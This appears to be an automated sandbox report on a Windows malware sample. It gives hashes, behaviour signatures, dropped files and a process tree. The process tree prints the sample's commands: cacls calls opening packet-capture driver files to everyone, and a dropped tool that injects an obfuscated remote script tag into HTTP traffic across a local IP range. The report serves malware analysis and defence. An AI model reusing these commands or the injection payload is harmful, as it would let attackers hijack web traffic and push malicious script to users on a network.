Analysis

  • max time kernel
    92s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240708-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240708-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    09/07/2024, 00:29

General

  • Target

    2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe

  • Size

    513KB

  • MD5

    2e60c5e2982ae0b32ef5e23e8f332685

  • SHA1

    12a5d6ac17f2221d671304f4d6e88b00c40acf8f

  • SHA256

    4a44a21023dc9880fceb1bd694c0590d162344016b530267f0808d86e405ef4a

  • SHA512

    2ddb3559b2dc878e5904e3904a3ceaf2b8ea8567362169e22164601c0691f8b265304c299a30631dbe8defb440bc908bd12e02492952d57dcd944e8c80357977

  • SSDEEP

    6144:7MSbWohE9q2PsXrSVew/X2+wZHeSPVep6s6BCF6GfEWfadRNH0QV:7NW2E9/cZw/X6eSPtfS6G6h

Score
8/10

Malware Config

Signatures

  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Drops file in System32 directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe"
    1⤵
    • Drops file in Drivers directory
    • Checks computer location settings
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:1756
    • C:\Windows\SysWOW64\cacls.exe
      "C:\Windows\system32\cacls.exe" C:\Windows\system32\drivers\npf.sys /e /p everyone:f
      2⤵
      PID:4656
    • C:\Windows\SysWOW64\cacls.exe
      "C:\Windows\system32\cacls.exe" C:\Windows\system32\Packet.dll /e /p everyone:f
      2⤵
      PID:4896
    • C:\Windows\SysWOW64\cacls.exe
      "C:\Windows\system32\cacls.exe" C:\Windows\system32\WanPacket.dll /e /p everyone:f
      2⤵
      PID:3956
    • C:\Windows\SysWOW64\cacls.exe
      "C:\Windows\system32\cacls.exe" C:\Windows\system32\wpcap.dll /e /p everyone:f
      2⤵
      PID:2148
    • C:\Windows\SysWOW64\cacls.exe
      "C:\Windows\system32\cacls.exe" C:\Windows\system32\npptools.dll /e /p everyone:f
      2⤵
      PID:4564
    • C:\Windows\SysWOW64\360saty.exe
      "C:\Windows\system32\360saty.exe" -idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=javascript src=http://z%6Bm.r%72.%6Eu/tj.js></script>"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:4768

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Windows\SysWOW64\360saty.exe

    Filesize

    8.0MB

    MD5

    85f14f1c3260a1157847d20989dbf453

    SHA1

    d5923b0b35694ae9e6ede15add0020afa18fb616

    SHA256

    a5314367af2b8d451b76b9ed971797a0e7b93f7fef3fc25688a4068cf6c27efd

    SHA512

    efa4a250dc9d073bc74e8945ac3d5141dbf5553ae8e7fb7afdbe3d60a2c962875ce3239014aab256632b0d75efcc666a0c973c9bfee75cc0e585cf5b50aad80e

  • C:\Windows\SysWOW64\WPCAP.DLL

    Filesize

    234KB

    MD5

    ce842d25e5b7e6ff21a86cad9195fbe8

    SHA1

    d762270be089a89266b012351b52c595e260b59b

    SHA256

    7e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3

    SHA512

    84c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6

  • C:\Windows\SysWOW64\WanPacket.dll

    Filesize

    66KB

    MD5

    fdd104a9fd3427a1df37041fa947a041

    SHA1

    cca1881a3c02033008f78cc39b712b637c7f3e13

    SHA256

    384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a

    SHA512

    9dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7

  • C:\Windows\SysWOW64\packet.dll

    Filesize

    86KB

    MD5

    9062aeea8cbfc4f0780bbbefad7cebcb

    SHA1

    c4ad39ec51ad0e84fe58f62931d13cddfde3189e

    SHA256

    b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c

    SHA512

    60957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646

  • memory/1756-0-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/1756-24-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/4768-12-0x0000000000400000-0x000000000040F000-memory.dmp

    Filesize

    60KB

  • memory/4768-23-0x0000000000680000-0x0000000000690000-memory.dmp

    Filesize

    64KB

  • memory/4768-19-0x0000000000660000-0x0000000000675000-memory.dmp

    Filesize

    84KB

  • memory/4768-25-0x0000000000400000-0x000000000040F000-memory.dmp

    Filesize

    60KB